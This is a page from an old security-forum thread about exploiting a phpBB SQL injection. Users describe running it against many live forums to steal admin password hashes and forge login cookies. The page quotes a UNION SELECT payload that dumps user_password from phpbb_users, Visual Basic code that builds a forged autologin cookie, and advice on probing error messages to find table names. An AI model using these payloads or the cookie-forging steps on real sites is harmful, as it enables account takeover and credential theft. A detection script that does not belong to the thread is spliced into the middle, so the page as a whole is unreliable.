IT Security and Insecurity Portal

yes

Posted: Sat Jul 24, 2004 1:29 am
l3az3ouze
Beginner
Joined: Jul 23, 2004
Posts: 2

I used to try this SQL vuln on many phpbb websites, but I found that when I'm using a normal user md5 it works 100%, but when I'm using an Admin md5 pass in the cookies, it doesn't log me in!!!!!
Maybe there is a second username or password, isn't it?

Posted: Sat Jul 24, 2004 9:25 am
zer0-c00l
Advanced user
Joined: Jun 25, 2004
Posts: 72
Location: BRAZIL!

Code: | Could not query private message post information
DEBUG MODE
SQL Error : 1222 The used SELECT statements have a different number of columns
SELECT u.username AS username_1, u.user_id AS user_id_1, u2.username AS username_2, u2.user_id AS user_id_2, u.user_sig_bbcode_uid, u.user_posts, u.user_from, u.user_website, u.user_email, u.user_icq, u.user_aim, u.user_yim, u.user_regdate, u.user_msnm, u.user_viewemail, u.user_rank, u.user_sig, u.user_avatar, pm.*, pmt.privmsgs_bbcode_uid, pmt.privmsgs_text FROM phpbb_privmsgs pm, phpbb_privmsgs_text pmt, phpbb_users u, phpbb_users u2 WHERE pm.privmsgs_id = 99 AND pmt.privmsgs_text_id = pm.privmsgs_id AND pm.privmsgs_type=-99 UNION SELECT username,null,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,user_password FROM phpbb_users WHERE user_level=1 LIMIT 1/*AND ( ( pm.privmsgs_to_userid = 272 AND pm.privmsgs_type = 3 ) OR ( pm.privmsgs_from_userid = 272 AND pm.privmsgs_type = 4 ) ) AND u.user_id = pm.privmsgs_from_userid AND u2.user_id = pm.privmsgs_to_userid
Line : 247
File : /home/********/public_html/forum/privmsg.php
????

Posted: Sun Jul 25, 2004 12:23 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Seems like a modified SQL query. Try to add "null"-s one by one, until you stop getting the error message "different count of columns".
|
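For a board operator, the debug output quoted in this thread is itself a detection signal. As an added example (not part of the original thread and not phpBB code), this parses captured "SQL Error" blocks and flags the ones that look like injection probing; the sample text, paths, table names and the hint attached to each error number are constructed assumptions.

```python
import re

# MySQL error numbers quoted in this thread; the hint attached to each is an
# editorial assumption about what repeated occurrences suggest.
ERROR_HINTS = {
    1222: "UNION column-count mismatch",
    1064: "syntax error, possibly from injected text",
    1146: "query against a guessed table name",
}
# One debug block: error line, echoed query, then "Line :" and "File :".
BLOCK = re.compile(
    r"SQL Error : (\d+) ([^\n]*)\n(.*?)Line : (\d+)\nFile : (\S+)", re.S)
INJECTED = re.compile(r"\bunion\s+select\b|/\*", re.I)

# Constructed sample modelled on the output quoted in the thread;
# paths, table names and queries are placeholders.
SAMPLE = """\
SQL Error : 1222 The used SELECT statements have a different number of columns
SELECT pm.* FROM phpbb_privmsgs pm WHERE pm.privmsgs_type=-99 UNION SELECT username,null FROM phpbb_users LIMIT 1/*
Line : 247
File : /var/www/forum/privmsg.php
SQL Error : 1146 Table 'forumdb.phpbb_users' doesn't exist
SELECT search_array FROM xx_search_results WHERE search_id = 1 UNION SELECT 1 FROM phpbb_users
Line : 120
File : /var/www/forum/search.php
"""

def parse_debug_errors(text):
    """Turn captured debug output into one record per SQL error block."""
    records = []
    for code, message, query, line, path in BLOCK.findall(text):
        records.append({
            "code": int(code),
            "message": message.strip(),
            "hint": ERROR_HINTS.get(int(code), "other"),
            "union_in_query": bool(INJECTED.search(query)),
            "source": f"{path}:{line}",
        })
    return records

def summarize(records):
    """Count suspicious error blocks per script, for alerting."""
    counts = {}
    for rec in records:
        if rec["hint"] != "other" or rec["union_in_query"]:
            script = rec["source"].rsplit(":", 1)[0]
            counts[script] = counts.get(script, 0) + 1
    return counts

if __name__ == "__main__":
    print(summarize(parse_debug_errors(SAMPLE)))
```

The same output hands the requester the query text, line number and file path, so a production board should log it server-side rather than send it to the browser.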

Posted: Sun Sep 12, 2004 3:12 pm
dj_wolf
Beginner
Joined: Sep 05, 2004
Posts: 2

What does this word in the text mean, and how can I get uidsize:
Dim uidsize As String
Dim uid As String
Dim md5hash As String
Private Sub Command1_Click()
    uid = Text1.Text
    uidsize = Len(uid)
    md5hash = Text2.Text
    Text3.Text = "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%22" + md5hash + "%22%3Bs%3A6%3A%22userid%22%3Bs%3A" + uidsize + "%3A%22" + uid + "%22%3B%7D"
End Sub

Posted: Mon Sep 13, 2004 4:20 am
morrowasted
Regular user
Joined: Sep 06, 2004
Posts: 10

Can this exploit also be used for XMB?

_________________ I'm new to all this, sorry for my dumbness.

Posted: Mon Sep 13, 2004 7:49 pm
dj_wolf
Beginner
Joined: Sep 05, 2004
Posts: 2

Hi, I don't get the admin's MD5 hash, plz help. I use this link but I don't
I use this link for site XXX and it gets me the text, but I can't release the MD5 hash because each time it gets me a different MD5 hash:
RESULT:
SQL Error : 1064 You have an error in your SQL syntax near 'union select% 20concat(char(97,58,55,58,123,115,58,49,52,58,34,115,101,97,114,99' at line 3

Posted: Fri Oct 29, 2004 6:07 pm
zyon
Beginner
Joined: Oct 28, 2004
Posts: 1

Hi.
I hope I won't ask too much if I ask for more hints here.
How to provoke these various mysql error messages?
I really need help on this.
waraxe wrote: | Well, you have sql injection case already, if you see that error message. So try now to provoke various mysql error messages, and maybe one of them will reveal real table name...
kranium wrote: | well thx for your help, u rule
but one little question. I was trying using your knowledge but I've got this error:
Quote: | SQL Error : 1146 Table 'lusodemo.phpbb_users' doesn't exist |
so it seems that these guys have some kind of prefix in their tables, and i can't figure it out
so, i ask if there's any way i can get the correct table (or the table list) of this forum, maybe using a SHOW TABLES (i tried it without success)...
if you can help with some magic query i'll be very grateful
sorry my bad english and keep your excellent work

Mozilla doesn't accept edited cookies

Posted: Thu Nov 11, 2004 9:08 am
Dieselboy
Beginner
Joined: Nov 11, 2004
Posts: 1

Last edited by Dieselboy on Wed Jul 20, 2005 3:35 pm; edited 1 time in total
_________________ You will respect my authority!

Posted: Fri Apr 01, 2005 8:47 pm
TheRipper
Regular user
Joined: Mar 25, 2005
Posts: 6

does it work with phpbb 2.0.13 ??

Posted: Sat Apr 02, 2005 1:32 am
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Have not tested, but it will work, unless phpbb developers have not taken some countermeasures.

Posted: Sat Apr 02, 2005 12:17 pm
y3dips
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia

TheRipper wrote: | does it work with phpbb 2.0.13 ?? |
if u can steal the admin ids

_________________ IO::y3dips->new(http://clog.ammar.web.id);

Posted: Mon Apr 11, 2005 3:48 pm
TheRipper
Regular user
Joined: Mar 25, 2005
Posts: 6

I have both (taken from an old database) but I don't know if the password is still the same

Posted: Tue Apr 12, 2005 8:55 am
shai-tan
Valuable expert
Joined: Feb 22, 2005
Posts: 477

So wait a minute... Did someone just stumble across a 2.0.13 exploit or is it yet another false alarm?

_________________ Shai-tan
"In short: just say NO TO DRUGS, and maybe you won't end up like the Hurd people." -- Linus Torvalds

Posted: Fri Apr 29, 2005 1:56 am
w00t
Beginner
Joined: Apr 29, 2005
Posts: 1

Hey,
I've been interested in this for a while, but it's never worked for me. I can gain the hashes, edit all required information, but it just never logs me in, I always log in to my account.
I'm thinking this may be because of updated version(s) or firefox (I'm running 2.0.3). Are there any browsers anyone can recommend?

Posted: Fri May 20, 2005 8:20 am
Twinky
Regular user
Joined: May 20, 2005
Posts: 5

I try this... but the md5 hashes don't display in the url
All times are GMT
Page 3 of 5